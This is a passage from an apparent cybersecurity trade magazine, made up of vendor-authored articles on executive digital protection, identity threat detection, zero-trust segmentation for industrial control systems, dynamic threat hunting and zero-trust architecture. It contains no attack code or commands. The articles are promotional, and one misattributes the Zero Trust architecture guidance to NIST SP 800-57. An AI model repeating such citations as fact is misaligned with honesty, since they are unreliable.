devices, and home networks - of executives, Board Members, and other high-profile employees with

access to finances, proprietary data, and personal information that cybercriminals want to compromise

and place under their control.

207

Vulnerabilities and minimal security controls entice cybercriminals

It’s not hard to understand why cybercriminals, in particular criminal groups and nation-states, now

choose to attack individuals as the stepping stone into an organization’s digital infrastructure.

For one, most high-profile employees almost always lack the cybersecurity and privacy protections

afforded to them by work when outside of the company’s four walls. In fact, proprietary BlackCloak data

has found that:

● 39% of executives have malware on their personal devices

● 59% of executives have antivirus on their personal devices

● 40% of executives have their IP address available on online data brokers

● 75% of executives’ personal computers are either totally unprotected or operating using default

security settings

Second, the smartest cybercriminals know that CISOs cannot extend enterprise protections into personal

digital lives. Due to ethics risks, privacy laws, SEC requirements, and lack of team bandwidth, among

other factors, security teams cannot simply deploy enterprise protections on personal devices and

networks. Likewise, CISOs maintain zero authority to mandate a spouse or child, or even an executive

for that matter, to follow a protocol or best practice when not in the office. Imagine the look of dismissal

one would receive when telling a teenager of an executive to comply with a rule?

Finally, executives are vulnerable in their personal digital lives because consumer cybersecurity and

privacy protections are no deterrent. Commoditized safeguards, such as signature-based antivirus and

credit card monitoring masquerading as identity theft protection, provide minimal resistance, if any, to

today’s most sophisticated threats.

As such, the path of least resistance into the enterprise is to attack - either by social engineering,

spoofing, malware injection, communications hijacking, or one of many other attack techniques - the

personal digital lives of a company’s most important personnel.

The enterprise as collateral damage

It’s important to note that not all cybercriminals are attacking executives' personal lives exclusively to

move laterally into their organization. Many times, the executives themselves are the target due to their

wealth or status. Nonetheless, an attack on an executive as an individual almost always has some

consequence on the organization.

For example, a CEO of a major autonomous car company is hacked with financial fraud as the objective.

The attack unintentionally exposes private information about the family’s political leanings, which are in

contrast to the mainstream views. While the executive is the victim, the news focuses on the information

leak, and the public backlash to the politics is swift and harsh.

208

The company then takes a big reputation hit with the public, and many employees are dismayed and

unsure about their future of work. Business continuity is disrupted, and crisis remediation strategies are

forced into action.

In this example, the company wasn’t the primary target (the CEO’s wealth was), but the collateral damage

was plenty impactful.

Reducing risk with digital executive protection

The hit Apple TV show “Severance” in which technology prevents one’s work-life and personal-life from

ever intermingling is a great drama, but it is so far removed from today’s work reality that it's best classified

as science fiction.

Even before the pandemic, the lines between personal and professional lines were thinning. Now, with

remote and hybrid work permanent for so many, and with IoT proliferation accelerating at rapid scale, it's

hard for most security teams to be certain about where their perimeter begins and where it actually ends.

That’s why protecting executives in their personal digital lives to protect the company has been a complex

problem to solve. Fortunately, a new wave of digital executive protection solutions make it possible to

take the burden off of the cybersecurity team and put it into the hands of a third-party that can focus

exclusively on mitigating this specific risk factor without the privacy, legal, and bandwidth concerns.

Attacking the personal digital lives of executives may be a threat in its infancy when compared to other

challenges security teams deal with on a daily basis. But it is a threat worth addressing before it gets

completely out of control.

About the Author

Dr. Chris Pierson is the Founder & CEO of BlackCloak, a leader in

digital executive protection for corporate executives, high-profile

and high-net-worth individuals and their families. Chris has been on

the front lines of cybersecurity and privacy in both the public and

private sectors for over 20 years. Previously at the Department of

Homeland Security, Chris served as a special government

employee on their Cybersecurity and Privacy Committees. He’s

also spent time as the Chief Privacy Officer for Royal Bank of

Scotland (RBS), as the Chief Information Security Officer for two

prominent FinTechs, and is also a Distinguished Fellow of the

Ponemon Institute.

Chris can be reached at chris@blackcloak.io, on Twitter

@DrChrisPierson and at our company website www.blackcloak.io.

209

210

Sometimes, organizations change from within, while other times change is thrust upon them—and fast.

The COVID-19 pandemic is an excellent example of one of those “other times.” It would be difficult to

imagine a situation where change was thrust upon organizations more quickly and unexpectedly than

over the past two years, especially true for their IT infrastructures. The massive shift to remote work

helped save countless enterprises from business disruption, but it came at a cost. Even the most forward-

thinking organizations did not consider widespread remote access when implementing security models.

The massive proliferation of poorly secured endpoint devices—including personal computers and

phones, unsecured modems and routers, and other devices—has put the need for greater endpoint

security in the spotlight. Typically, that has meant turning to endpoint detection and response (EDR)

solutions, but traditional approaches to EDR are no longer enough. Today’s attackers are breaking out

from the endpoint using identity-based attacks, requiring organizations to rethink their approach to

endpoint security. Organizations must complement or upgrade their EDR solutions with identity threat

detection and response (ITDR) tools capable of providing the protection needed to combat today’s

identity-based threats.

It’s Time to Rethink Endpoint Security

By Carolyn Crandall, Chief Security Advocate, Attivo Networks

211

Identity-Based Attacks Continue to Increase

Attackers recognize that using identity-based attack methods makes it easy to circumvent traditional

perimeter defenses and directly access corporate networks. And unfortunately, credential theft has

proven to be an easy way for attackers to compromise those identities. The most recent Verizon Data

Breach Investigations Report (DBIR) indicates that credential data is now present in a staggering 61% of

attacks, highlighting the ease with which attackers can access it. Too many organizations leave credential

data exposed on the endpoints, rendering them and the systems they have access to dangerously

vulnerable.

Unfortunately, even with EDR and Identity and Access Management (IAM) systems there remain gaps in

protecting credentials, privileges, and the systems that manage them. They simply aren’t designed to

detect credential-based attacks. What’s more, as the number of identities in use continues to rise, and

gaining sufficient visibility into those identities’ permissions isn’t always easy. Assigning the correct level

of access to identities can be challenging at scale, leading to overprovisioning or granting more access

than is needed to avoid workflow disruptions. On the one hand, this ensures that identities will rarely have

trouble accessing the data they need. On the other hand, an attacker who compromises an identity will

have access to much more data than they otherwise would.

Of course, attackers don’t stop at one compromised identity. Once inside the network, they will move

laterally and attempt to escalate their privileges, conduct reconnaissance, and perform other attack

activities. Most attackers will target Active Directory (AD) to achieve their goals. Since AD serves as the

primary identity service for roughly 90% of Global Fortune 1000 organizations, handling authentication

throughout the enterprise, attackers looking to escalate their attacks consider it a high-value target. If

adversaries can compromise AD, removing them from the network becomes extremely difficult.

Protecting endpoints—and, by extension, identities—is essential to prevent that from happening.

Rethinking Endpoint Security

The line between endpoints and identities has blurred with the advent of cloud services and the

proliferation of nonhuman identities removing any clear delineation. A virtual machine in the cloud might

be both an endpoint and an identity—after all, it has permissions and entitlements that allow it to access

specific data and areas of the network. This state presents a new opportunity for attackers and forces

defenders to think of endpoint security as they would think of identity security.

Keeping endpoints secure starts with visibility. Organizations need visibility into any exposed identity

assets on endpoints, including orphaned or duplicate credentials, privileged accounts, etc. Defenders

cannot protect identities when they cannot easily see or understand exposures related to user, device,

and domain controller misconfigurations and vulnerabilities. Identifying potential attack paths from the

endpoint to Active Directory and critical servers is also essential. Once they have a good sense of the

exposures and other vulnerabilities endangering the endpoint, the organization can begin the process of

remediation.

Defenders then need to prioritize credential protection. Preventing credential theft is essential in today’s

threat environment, and organizations can take steps like binding their credentials to applications to make

212

it harder for attackers to steal and use them. Defenders can also be proactive, placing false credentials

on network endpoints to trick attackers into stealing them. When an attacker attempts to use a set of

deceptive credentials, the system can flag it as attacker activity and notify defenders in real time. In

addition to seeding decoy credentials, organizations can also take steps to hide their real credentials,

making them invisible to attackers. Much like defenders cannot protect what they cannot see, attackers

cannot steal what they cannot see. And if they can’t compromise a valid identity, they will find it that much

harder to break out from the endpoint and escalate their attacks.

Bringing Endpoint and Identity Security Together

Organizations are increasingly implementing ITDR solutions to complement EDR tools and provide the

ability to address credential theft, credential misuse, privilege escalation, and other attack activities that

traditional endpoint security solutions are not designed to manage. Together, these solutions can help

defenders identify potential vulnerabilities on the endpoint while adding real-time detection capabilities to

identify suspicious activities like mass account or password changes, brute force attacks, use of disabled

accounts, and more. The ability to conceal valid credentials while seeding fake ones designed to attract

adversaries adds a new layer of defense designed to make it harder for attackers to break out from the

endpoint and reach Active Directory. By rethinking their approach to endpoint security and integrating it

with identity-based solutions, today’s organizations can shore up their defenses against some of today’s

most prevalent—and evasive—attacks.

About the Author

Carolyn Crandall is the strategic advisor for SentinelOne, an autonomous

cybersecurity platform company. Prior to SentinelOne, Carolyn served as the

Chief Security Advocate and CMO at Attivo Networks. She is a high-impact

technology executive with over 30 years of experience in building new

markets and successful enterprise infrastructure companies. She has a

demonstrated track record of taking companies from pre-IPO through to

multibillion-dollar sales and held leadership positions at Cisco, Juniper

Networks, Nimble Storage, Riverbed, and Seagate.

213

Safeguarding Industrial Control Systems

Environments

Preventing internal & external cybersecurity breaches with zero trust OT network segmentation

By Ryan Lung, Senior product manager at TXOne Networks

In the last years, malicious actors have threatened organizations with increasingly higher risks of losses

of money or even of lives. In response, security researchers developed more secure and reliable network

security methodologies. Prior to the invention of the zero trust approach, network defense was typically

based on two separate “trust levels”— inside network and outside network (the internet). Communications

originating from the inner network were considered trustworthy; those from the outer network were not.

As malicious actors have rapidly developed their skills, they have shown clearly that these traditional

methods cannot meet post-digital transformation security needs. This is why the zero trust model insists

that we “never trust, always verify” and even for industrial control system (ICS) networks key ideas

borrowed from it can lead to a much better overall security in OT (operational technology) environments.

OT zero trust cybersecurity provider TXOne Networks shows that these defensive improvements are

more necessary with every passing day.

214

Increasing OT threat landscape

The terrain of the OT threat landscape is changing with the rhythms of Industry 4.0, industrial IoT, and

digital transformation. Stuxnet was one of the first pieces of malware specifically designed to target an

industrial control system (ICS) and caused the first major OT cyber incident. This kind of attack was

unlikely in an OT environment until 2017, when a worm called WannaCry propagated extremely widely.

In the aftermath many different kinds of malware emerged, and malicious actors began putting serious

work into designing targeted ransomware attacks to exploit specific industry verticals. The greater

productivity promised by modern technologies drives manufacturers to embrace them and to take the

risk of opening the door further to networking and the internet. However, every advancement brings with

it new attack surfaces, and the potential for another, even more aggressive wave of cyberattacks.

Finally, as a decentralized, untraceable digital currency, Bitcoin is the perfect means by which criminals

can collect ransoms without fear of the payment being tracked to reveal their identities. These factors

ensure the continual shifting of the threat landscape. Once attackers have created a new form of malware,

the malware typically gets into an OT environment through insider threats or external cyberattacks.

Insider threats and external attacks

Insider threats can be either unintentional or intentional. In an unintentional case, an employee or third-

party visitor, unknowingly brings an infected device onto the premises. An intentional case might result

from a dissatisfied employee or one who has been paid by third parties to conduct sabotage. In both

cases, unsecured USBs or laptops are the typical devices that transmit threats.

External cyberattacks often begin in the IT network, most commonly start with a phishing attack and

usually take the form of ransomware or bots. Ransomware encrypts assets and offers them back to

stakeholders at a high price. Bots usually allow attackers to prepare for or set up the rest of the attack,

e.g., allowing them to take direct control of systems, execute applications, or collect important

information. Once attackers have compromised the control center network, it’s very easy for them to

spread malware and escalate privileges in different levels of the system. Effects can include entire

production cycle shutdown, damage to assets, or human endangerment.

Network segmentation vs. cyberattacks

Network segmentation has become a common means for organizations to repel modern cyberattacks,

and this practice not only strengthens cybersecurity but also helps to simplify management. As quarantine

for malware is built into the network’s design, if an asset gets infected, only that segment will be affected.

The options for intruders are drastically reduced, and they will be unable to move laterally. For IoT

devices, it allows the data and control paths to be separated, making it more challenging for attackers to

compromise devices. Even if one production line is affected by a cyberattack, the threat will be contained

so that the others can continue to work.

215

For the Management, network segmentation makes it easier to monitor traffic between zones and

empowers administrators to deal with a massive amount of IoT devices. As new communication

technologies are added to worksite environments, network segmentation will be the first line of defense

and the foundation for keeping risk low.

Building up zero trust OT environments

While the core of zero trust is network segmentation, stakeholders who want to bulletproof their worksite

and keep the operation running should also implement virtual patching, trust lists, hardening of critical

assets, and security inspections.

To support policy management, maintenance, and event log review, solutions used to implement these

practices should be centralized. In addition, ideal network segmentation solutions for OT and ICS

environments must be OT-native and need to come in different form factors for

different purposes. The two key form factors are OT-native IPSs for micro-segmentation and 1-to-1

protection of critical assets, and OT-native firewalls for transparently creating segmentation with

broader definition of network security policy. IPSs can also come as an “array”, where many of them are

included in one appliance for ease of management.

In order, to create advanced configurations at the command level, these appliances should have the

ability to support the OT protocols that the work site’s assets use. Thus, micro-segmentation can be

conducted using trust lists set at the network level and OT-native IPSs or firewalls at the protocol level.

In addition, support for virtual patching is necessary as well and critical assets should be hardened using

trust lists deployed within the device, at the level of applications and processes.

Creating trust lists

Firstly, for fixed-use legacy assets, it’s as simple as creating a trust list that only allows applications and

processes necessary to the asset’s purpose to run, which also prevents malware from running. Secondly,

for modernized machines that have more resources and must conduct a variety of tasks, hardening must

be based on trust lists with a library of approved ICS applications and certificates, as well as machine

learning. In addition, security inspections for stand-alone or air- gapped systems as well as inbound and

outbound devices prevent insider threats from affecting company operations. The concept of zero trust

has shown OT security intelligence specialists that network trust awareness is critical to maintaining

operational integrity.

Conclusion

Implementing zero trust in OT and ICS environments is much easier with network segmentation and

therefore network segmentation has become a byword in work site cyberdefense. However, when IT-

based solutions are deployed in operational technology and ICS environments, their large demands on

resources and lack of sensitivity to OT protocols are just as likely to interfere with operations as they are

to protect them. For this reason, TXOne Networks has developed OT-native solutions, supported by the

216

efforts of threat researchers who constantly monitor the threat landscape. As malicious actors develop

new methods of cyberattack, the best practices of network segmentation, virtual patching, trust lists,

hardening critical assets, and periodic security inspections allow organizations to repel the cyberthreats

of today and prevent the threats of tomorrow.

For more information, visit TXOne Networks.

About the Author

Ryan Lung is a senior product manager at TXOne Networks,

where he manages TXOne Networks’ networking product

management and design teams and is responsible for ICS

network security products. He has worked in network security

product management and design for over 14 years. Ryan Lung

earned an M.S. degree in Information Management from National

United University.

Short biography

Ryan Lung can be reached online at contact@txone.com

217

218

Securing Your Organization During Global

Turmoil

Repelling Cyber Criminals Trying to Capitalize on a Crisis

By Kevin Orr, President, RSA Federal

Current geopolitical crises unfolding around the globe have far-reaching implications. In just a few short

months, we have seen change on a global scale, impacting people, business and society as a whole.

Unfortunately, it is this type of environment in which cyber criminals thrive. As a result, organizations

today must quickly adapt to new market dynamics, evolving partner and customer relationships and

changing business operations during these turbulent times.

At its infancy, the landscape of data security was fairly simple, allowing for an open-door system of

exploration, protected from hackers by firewalls and other, relatively standard, cybersecurity measures.

However, as personal data became more and more omnipresent in the digital landscape, so too did

mining and theft of it. As a result, certain aspects of protection did not keep up, leaving personal data and

information more easily accessible for cyber criminals to collect and exploit. Today, the current

geopolitical crisis combined with the increases in always-on access brought on by trends like remote

work and the potential for everybody to interact with anybody has created a much more complex

landscape. This complexity has also enabled opportunity for data to be compromised, creating an

inherent need for enhanced cybersecurity measures to secure the copious amount of data and

information that is disseminated online.

219

While this complex cybersecurity landscape has created many challenges for businesses and

government organizations alike, we are now seeing for the first time a uniform approach to cybersecurity

being implemented. The current threat landscape also underscored the importance of Executive Order

14208 and other pending legislation aimed at improving cybersecurity posture. Personal data has evolved

not just into a commodity, but a means of leverage or even extortion of certain individuals. Data theft can

mean more than just exposure of sensitive information; it can also seriously impact national security,

companies or individuals whose reputations and ethics are being exploited. And we must not forget about

the fatal impact of extortion as a result of data being held hostage.

All of this indicates that there is an inherent need to update cybersecurity practices toward a method of

zero-trust, rather than the traditional trust but verify approach. But what does this approach actually look

like? Companies and government agencies are often sharing upwards of thirty percent of their data with

third party collaborators – an inevitability of working with other agencies in a digital environment. This

places the focal point of data security not on the data itself, but rather the governance of ensuring that

individuals gaining access to this information, are in fact who they say they are. Legitimate figures have

become increasingly hard to recognize in a digital age, from sources of misinformation, trojan horses and

rapidly advancing ransomware – and in many cases, malicious sources have become increasingly

identical in appearance to reputable ones. Solutions like multi-factor authentication have proven effective

across these areas, many organizations and government agencies have some ground to cover to meet

the highest security standards through the implementation of advanced identity and access management

capabilities.

The Nirvana of these solutions would center around the narrative of: What is my most critical information?

How is it protected? Who has access to it? And who provides accountability for that access? Individuals

should be able to tier the potential threat level to their data or security, and strategize how to grant access

to other users, without compromising sensitive information, and finally, be able to disrupt access to this

information at their own discretion.

The next definitive phase in cybersecurity solutions will likely be centered around Identity proofing and

governance of data access, versus what specific data is accessible. Rather than focusing on specific

entitlements to data for individuals, the solution instead lies in creating a zero-trust environment with no

exceptions. In other words, instead of continuing the current landscape of de-facto “trust but verify” before

setting up protection, the order of operations should be carried out in reverse priority, shifting from a free-

reign approach to more prescriptive access of data and information.

The cybersecurity challenges for organizations and government agencies alike have only grown the past

few months. Now is the time to improve upon cybersecurity posture across the board, taking into account

the proper cybersecurity strategy and solutions built upon the concept of zero-trust. Only then will today’s

organizations properly protect themselves from bad actors that thrive in turbulent times.

220

About the Author

Kevin Orr is President of RSA Federal, which provides security

solutions to federal agencies including U.S. intelligence, state/local

municipalities and public sector agencies. With over 25 years of

government experience in leading hyper-growth technology

organizations, he has proven leadership in opening new markets,

attracting and retaining world class talent and leading in challenging

environments. Kevin can be reached online at

https://www.linkedin.com/in/kevinmichaelorr/ and at our company

website https://www.rsa.com/.

221

The Emergence of Dynamic Threat Hunting

A review of the evolving cyber security industry over 15 years in business

By James “Jim” McMurry, CEO / Founder, Milton Security, Inc.

No one can argue that cyber security is the same today as it was fifteen years ago. There have been

numerous trends and companies that we’ve seen come and go over the last decade-and-a-half, but what

is most intriguing is the evolution of the industry and the emergence of Dynamic Threat Hunting (DTH).

We’ll get into the specifics of what exactly Dynamic Threat Hunting is and how it differs from the industry

norms in a bit, but first, it is helpful to provide a backdrop for how we managed to get to this point.

As with all good storytelling, it’s important to have a central metaphor that helps us tie everything together

and better understand the key points. In this case, we’re going to use the classic story of the Trojan

Horse, first because the story is well-known and second because it does an exceptional job helping to

visualize the evolution into Dynamic Threat Hunting that we have been observing and preaching for

years.

222

Your Trojan War

When reviewing Greek mythology, the Trojan War was fought between the Greeks and the people of

Troy sometime in the 13th or 12th century BC. We won’t get into the events leading up to the war, because

those are irrelevant, however, just know that someone important was kidnapped - ever seen the movie

Taken? Yeah, just like that. The war raged on for quite some time with the Greeks trying desperately to

find any weakness in the defenses of the city…until one day, they just gave up.

Let’s assume, for this exercise, that your organization is the city of Troy. No, you didn’t kidnap anyone

and you haven’t wronged anyone, you’ve just been doing your own thing, trying to be successful as a

kingdom. You have been called in to put together a team to defend the city. It’s a vast area with thousands

of inhabitants, all of which have their own specific tasks and duties to keep the city running smoothly.

There is a large gate encircling the city that provides an initial line of defense and protection for the people

and goods inside.

Outside the gate lies the unknown, filled with malicious threat groups trying to lay siege to the city,

attempting to capture all that they can whether that is protected information, riches, or even disrupting

normal operations to the point where the city is hemorrhaging money. All they need to do is find a single

way in.

As commander of the army of Troy, how would you go about defending the city?

Defending Troy with a Static Security Operations Center

You decide to place sentries atop the city wall who can see for miles it seems. Your instructions are clear

that they are to report back to you with anything and everything they see. You sit back and wait and

almost immediately a messenger knocks on the door. They enter and tell you that Jane was planting

flowers in the city garden.

Alright, that’s great, but not quite what you had in mind.

As the messenger is leaving, another knock comes at the door. Another messenger to tell you that

someone is approaching the wall on horseback. Great. This is the kind of info you were looking for. You

tell the messenger to go find out more and report back.

Before they can leave, there is another knock, and when the door opens, you catch a glance of a line of

messengers that stretches down the hall and there are more coming. Each one delivers a piece of

information to you, with most reports being about the daily ongoings within the city. Someone is baking

bread, the blacksmith is fashioning horseshoes, and another person is delivering milk.

There are so many pieces of data that are coming in that you are completely overwhelmed with trying to

figure out what is relevant to your risk profile as a threat and what is just normal daily activity.

Thus is born the Static Security Operations Center. A place where all of the network data is funneled with

no clear picture of what is going on. Who was the person on the horse? Did they keep advancing or turn

223

and go a different way? Were they carrying anything that could be considered a threat? You just have to

find that one messenger and hope that they didn’t get sidetracked or tasked with something else.

Organizations that stood up a static SOC quickly became overloaded with data and no context around

this data. So, you decide to tune your instructions to the messengers and tell them to only report on what

is going on outside the walls of the city.

Defending Troy with a Context-Driven Security Operations Center

The next day, the line of messengers is much shorter. That’s a good start, at least. Until they begin

entering and reporting their observations.

Each one has a seemingly frightening message. There were groups that were beginning to assemble

outside the city wall. Each group had a clear leader and it looked like they were planning something.

Each leader was talking with their group, pointing to the city, looking down at a piece of parchment,

perhaps a map, and drawing things in the dirt.

As the day goes on, the messengers keep coming, not in the same quantities, but all seeming to give the

exact same report. You hear the same thing over and over and over again with no more information

added to help you determine what, if anything, you should do about these groups gathering outside the

city.

This is where we see the emergence of security tools and platforms that help provide context around all

the data that was flooding in. This did help organizations begin to paint a better picture - maybe there is

something going on that we need to pay attention to. Just like your messengers, you have alerts as far

as the eye can see. And now, you’re beginning to worry that they are planning something, or even worse,

something already got by the defenses and they are just waiting for a signal.

It makes a lot of sense to begin watching for suspicious activity within the walls again, not all activity, just

anything that looks out of the ordinary. And probably time to equip the sentries with some armor and

weapons to help defend against a possible breach.

Defending Troy with Managed Detection & Response (MDR)

The next day you give the new instructions to your sentries, and see to it that the supplies are delivered

to help protect Troy. Messengers begin to arrive and let you know that sometime overnight, there was a

delivery of wood and nails to the groups that were gathering off in the distance outside the city. Unsure

of what the materials are for or who delivered them, it looks like the groups are beginning to work together.

There is a clear leader among the different divisions, going back and forth between them and giving

directions and orders.

Occasionally, a few individuals on horseback ride closer to the wall and the sentries fire arrows in

response to deter the threat. The messengers are reporting this activity every time an arrow is fired. It

looks like everything is working. You are successfully defending the city and keeping the threats out.

224

Feeling rather confident in your plan, you retire for the evening and look forward to the next day.

Hopefully, the lack of ability to bypass the perimeter security will frustrate the groups outside the wall,

and eventually, they will disperse.

Managed Detection and Response has been the status quo for the cyber security industry for quite some

time now. There was a time, though, when it seemed like MDR was on the way out and Extended

Detection and Response (XDR) would take over because of the ability to paint a clearer picture of what

was going on outside your gates.

Imagine this same process going on for years. The same events get reported over and over again. There

is more wood and nails being delivered each day. A few individuals try to breach the gates but are

deterred by your defenses. On and on it goes. This is what we call event fatigue and what we observed

is that eventually, your team gets tired of paying attention to the details. On the outside, the city looks

completely secure and there is no need to worry.

Great. Until one morning, the groups outside are gone. Just like that, they have all disappeared and the

only thing that remains is a wooden horse parked just outside of the gate with a note that reads: “A gift

for you.”

What do you do?

Defending Troy with Dynamic Threat Hunting (DTH)

At this point, we all know the story. The city rejoices and the gift is brought inside where the unsuspecting

city of Troy falls to the adversary.

Wouldn’t it have been nice to know that the local sawmill workers have been working overtime for the

last 10 years, milling more wood than the city needed? Or that the blacksmith spent his extra time crafting

millions of nails and tools?

Wouldn’t it have been great to understand that during the dark of night, there were meetings going on

between people inside the city and the leaders of the external threat groups? Together, they were coming

up with a creative plan to deceive the sentries and evade being noticed?

Not every breach has an inside threat component to it, but sometimes, people, processes, and technology

lend themselves to being an easy target. Like assigning everyone local admin rights to their individual

computer so that when a link is clicked in a phishing email, the attacker now has absolute control over

that machine.

Dynamic Threat Hunting is when you pair the wire-speed of AI and ML with the creative understanding

of human Threat Hunters to provide an intelligent, context-aware, and just-in-time security operation that

not only collects and analyzes the data but actually thinks like attackers and looks beyond the data, alerts,

and events.

To the trained Threat Hunter, a simple daily event can be the key to turning a scouting session into a

deep hunt. Pairing that with the speed of machines processing messages and telemetry about what is

225

going on in the world and within your network, a crystal clear picture can be uncovered. From there, you

have the ability to cut off the attack before it happens and keep your organization secure.

Defending Troy, like protecting your organization, is a monumental task and no quantity of tools or

platforms alone will get the job done. Likewise, you can’t just throw a bunch of bodies at it to solve the

problem either. It takes the two working in unison to successfully perform Dynamic Threat Hunting

It is no easy task to stand up a Dynamic Threat Hunting team with the ability to see through all the noise

and find the needle in the haystack, but it’s what Milton Security has been working towards for the last

15 years. We were the first Dynamic Threat Hunting provider, and after all this time, we’re still the leader.

About the Author

James “Jim” McMurry is the Founder and CEO of Milton Security,

the global leader in Dynamic Threat Hunting. With over 30 years

of combined experience in Security, Information Technology,

Telecommunication, Networking, Management, and Software

development, James founded Milton Security with the vision of

bringing exceptional network security within reach for all

organizations.

Prior to launching Milton Security in 2007, he worked with a broad

spectrum of companies ranging from startups to Fortune 1000 in

and around the Bay area. He also proudly served as a member of

the U.S. Coast Guard aboard the USCGC Taney and USCGC

Morgenthau.

McMurry has a passion for Bourbon and a deep hatred of beets. He openly shares both with everyone.

For more information on Milton Security, please visit https://miltonsecurity.com; for more about James,

follow him on LinkedIn, Instagram, and Twitter.

226

227

Zero Trust: Security Model for A Fluid

Perimeter

By Debanjali Ghosh, Technical Evangelist, ManageEngine

The concept of a network being fully enclosed within a building, and therefore easier to defend is gone.

Recent trends in cloud computing, BYOD, IoT and remote work have forced organizations to rapidly

adjust their security strategies to accommodate the new threat landscape. External attacks and malicious

insider threats emerge one after another, and traditional security perimeters fail to fulfil the urgent need

for comprehensive network security.

With remote work comes a string of considerations that require security professionals to change

their approach towards perimeter-based security models. Everyone within the corporate perimeter is

trusted by default in a castle-and-moat approach. Therefore, once the attacker gains access to the

network, they are free to move around, initiate ransomware attacks, and exfiltrate sensitive data onto

their systems. This is where Zero Trust emerges. The Zero Trust security model considers all resources

with suspicion, irrespective of the location. All inbound traffic and entities undergo strict authentication

before access is granted. In a Zero Trust security model, the fundamental basis of "trust" is based on

fine-grained access control and contextual authentication.

NIST, the National Institute of Standards and Technology, is among the most widely recognized federal

agencies for cybersecurity guidance. NIST's Special Publication 800-57 provides organizations with a

detailed blueprint for implementing Zero Trust architecture to tackle organizational security risks. Zero

Trust is a journey involving assessing, planning, and constructing the new generation network security

architecture gradually. This whitepaper provides an overview of the fundamentals of Zero Trust and the

components of migration methodology. Furthermore, it discusses the deployment scenarios of Zero Trust

in detail, where risk-based adaptive authentication and policy-driven algorithm optimizations are crucial

constituents to reduce implicit trust zones.

228

What is causing the perimeter to vanish?

As the organizational network expands, the number of devices located outside its perimeter increases.

Organizations are increasingly migrating to the cloud and adopting software-as-a-service (SaaS)

products for business continuity, cost efficiencies and digital transformation initiatives, making it

extremely difficult to manage endpoint security and monitor all user activity. The network perimeter

protected the on-premise data centers and corporate resources, which are now easily accessible through

unmonitored private networks. Hybrid data models where data is stored on-premises partially and

partially on the cloud make it difficult to enforce access controls around the network boundary. The rise

in the number of IoT devices has resulted in poor security management.

Challenges associated with perimeter-based security models

• The insider risk: When an insider is planning a malicious activity, there isn't any need for intruding

on the trusted network. The traditional perimeter-based model is not sufficient to deal with this

type of risk. Insider threats are difficult to defend as they have an added advantage of being

familiar with the organization's security structure. The level of visibility and granularity required to

mitigate insider threats cannot be fulfilled through traditional methods.

• Policy gaps: Certain business-critical data gets stored in two different systems using different

levels of access policies, and such instances often get unnoticed by security teams. External

attackers exploit these gaps between different policies or enforcement that apply to the same

asset. They leverage outdated policies or flawed authentication methods to break the perimeter.

• Vulnerable Endpoints: Vulnerable endpoints or software that contain security flaws can be

exploited by attackers. Endpoints should be monitored and updated regularly. Every device

connected to a private network can be a potential threat surface for attackers to execute code

and exploit vulnerabilities. These threat surfaces are sometimes used to gain access to business-

critical resources or hold hostage and steal sensitive information. This can be a security nightmare

for the enterprise.

• Dynamic Workloads: Most workloads are now either deployed on virtual machines or container

models, or cloud platforms. Hybrid cloud models allow workloads to be on either side of the

network boundary while allowing them to move around dynamically between on-premise and

cloud data centers. In such cases, obtaining visibility over workloads and creating relevant access

policies with the traditional network perimeter model can be challenging.

229

The solution is Zero Trust

Organizations worldwide are embracing digital transformation to ensure business continuity, and most

times, security is neglected. Cybercrime is now highly organized, and bad actors are sophisticated

enough to deploy APTs and move laterally within an organization's network. Traditional approaches are

failing to protect organizations in the new normal of remote work and industry-wide cloud

adoption. Securing modern enterprises from today's threat landscape, which aligns with the cloud

environment, requires a shared responsibility model.

A Zero Trust model can fulfil this cybersecurity need by deploying security controls that assume that the

network is already compromised. Legacy' network perimeter security and visibility solutions that keep

attackers out are no longer practical or robust enough. The concept of implicit trust is no longer effective

while depending on basic IAM solutions, is no longer practical. Zero Trust employs the least-privilege

principle and strong authentication methods to enforce access controls and enhance the network's

granular visibility.

A well-executed Zero Trust strategy is based on the principle of access, limit and monitoring. By enabling

organizations to precisely manage identities and monitor user activity, especially those with elevated

privileges, Zero Trust can act as the overarching system of organization's security framework.

With IoT devices eavesdropping and Wi-Fi router not being configured to WPA-2 , remote workforce

brings significant cyber risks. Productivity and security of employees working remotely can no longer be

ensured — or controlled. Enterprise-owned devices are traditionally managed, patched, and kept up to

date with security tools and policies. Even if Zero Trust security can't force employees working at home

to maintain basic cyber-hygiene, it can prevent a security breach because it fundamentally enforces

access controls at every segment within the network.

The only solution to this complex cyber threat landscape is the new-generation Zero Trust security

framework, which offers granular visibility and continuous monitoring of the network. Moreover, it

establishes trust that is dynamic and contextual risk-based, and grants access requests only if certain

access policy parameters are met.

Gartner's CARTA takes Zero Trust further by introducing continuous adaptation beyond the basic allow

or deny models to provide contextually relevant access. With context as king, CARTA's additional security

measures reduce breach risk and improve containment if a hacker gains access to the network.

230

The continuous improvement of Zero Trust in theory and practice has gone beyond micro-segmentation,

software-defined perimeter, and evolved into adaptive identity-based security solutions.

Steps to building a Zero Trust for a perimeter-based network

For an organization looking to deploy Zero Trust, a survey of assets, subjects, data flows, and workflows

is a good place to start. This will provide enterprises with detailed information on the current state of

assets before introducing any new business processes. The implementation of ZTA can be broken down

into several steps:

Identify enterprise subjects: The policy engine must possess knowledge regarding all enterprise subjects,

especially privileged users. The architecture is built in an inclusive way to provide IT administrators the

flexibility to perform business-critical tasks.

Identify enterprise-owned assets: The key component of ZTA requires identifying and monitoring both

enterprise-owned and non-enterprise-owned devices on the enterprise network. Hardware components,

virtual assets and BYOD assets are continuously logged and monitored to ensure that the policy engine

has detailed information while making resource access decisions.

Identify key processes: The enterprise identifies and ranks business processes as perceived by their

importance. Low-risk business processes are transitioned during the initial migration, whereas mission-

critical processes are migrated later. In a perimeter-based architecture, it is often difficult to make

enterprise resources available to remote employees. In such cases, transitioning cloud-based resources

to Zero Trust architecture benefits remote employees in availability and security. The policy enforcement

points ensure that all subject requests follow access policies to gain access to resources.

Creating policies for the Zero Trust environment: The enterprise identifies the value of subjects,

workflows, and business processes based on the risk associated with them. After this point, the IT

administrators determine which trust algorithm variation can be followed to ensure that all enterprise

policies are extensive and effective.

Identify solutions: The enterprise architects decide on the deployment model and the solution

components based on key business processes and their valuation.

231

Initial deployment and monitoring: During the initial deployment, the Zero Trust model can operate in

reporting-only mode to ensure that the key process and their related policies are operative and

comprehensive. In this mode, access is granted for most requests, and these sessions are logged and

continuously monitored to detect baseline patterns for the workflows. With a substantial understanding

of the baseline behavior of every asset and subject of the enterprise, it is easier for security teams to spot

an anomaly and prevent attacks.

Expanding the Zero Trust architecture: Once the enterprise enters a steady operational phase, it can

expand the architecture by including new devices, changes in network infrastructure and replacement of

